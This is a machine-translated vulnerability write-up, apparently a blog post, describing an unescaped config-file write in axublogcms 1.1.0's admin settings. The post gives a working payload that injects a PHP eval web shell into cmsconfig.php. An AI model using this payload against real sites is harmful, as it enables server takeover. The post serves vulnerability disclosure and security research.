The latest version of axublogcms1.1.0 Getshell
code execution vulnerability
Now the latest version is 1.1.0 Today I re-audited axublogcms1.0.6, and found a loophole that cares about tasteless, because not only version 1.0.6 exists, including the latest version.
Write the configuration file in the background, you can directly getshell.
Download the latest version of the source code for installation. For details, please see the articles I wrote before (http://www.cnblogs.com/Oran9e/p/7846987.html)
The installation is successful, log in to the background.
The basic settings, since there is no filtering on the input, can be written to the configuration file and the code executes.
Look at the code analysis
./ad/setconfig.php line 97, 102
Directly replace the submitted parameter $webkeywords without any escaping and other behaviors.
So here we can write a sentence. As seen in line 97, the ../cmsconfig.php file is directly included, so the written sentence is directly written into the cmsconfig.php file.
Insert a sentence at the keyword, here you need to close the previous webkeywords, and close the double quotes, otherwise the PHP file is incomplete and will not run.
For example: 123456";@eval($_POST['a']);$a="
At this time, look at the writing of ./cmsconfig.php
Successfully written, then verify it.
Source code link (link: https://pan.baidu.com/s/1QML_lTny4h30n2mH4uKTeA password: di3b)
The link to this article (http://www.cnblogs.com/Oran9e/p/8981705.html) is prohibited from being reproduced without permission.